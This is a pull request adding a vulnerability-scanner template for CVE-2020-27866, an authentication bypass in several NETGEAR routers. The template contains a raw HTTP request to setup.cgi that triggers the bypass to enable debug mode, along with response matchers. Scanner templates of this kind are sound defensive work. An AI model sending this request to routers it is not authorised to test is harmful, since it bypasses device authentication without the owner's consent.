### PR TITLE
Create CVE-2020-27866.yaml

### DIFF
--- a/cves/2020/CVE-2020-27866.yaml
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -19,7 +19,6 @@ requests:
         Accept-Encoding: gzip, deflate
         Accept: */*
         Accept-Language: en
-        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
         Connection: close
 
     matchers-condition: and
@@ -30,5 +29,5 @@ requests:
 
       - type: word
         words:
-          - 'Debug Enable'
+          - 'Debug Enable!'
         part: body

--- a/cves/2020/CVE-2020-27866.yaml
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -1,0 +1,34 @@
+id: CVE-2020-27866
+
+info:
+  name: Netgear Authentication Bypass vulnerability
+  author: gy741
+  severity: high
+  description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
+  tags: cve,cve2020,netgear,auth-bypass
+  reference: |
+      - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
+      - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
+      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
+
+requests:
+  - raw:
+      - |
+        GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Accept-Language: en
+        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - 'Debug Enable'
+        part: body


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-27866 rule.

```
This vulnerability allows network-adjacent attackers to bypass authentication on 
affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260,
 R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, 
Nighthawk AC2100, and Nighthawk AC2400 routers. 
Authentication is not required to exploit this vulnerability.
```

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

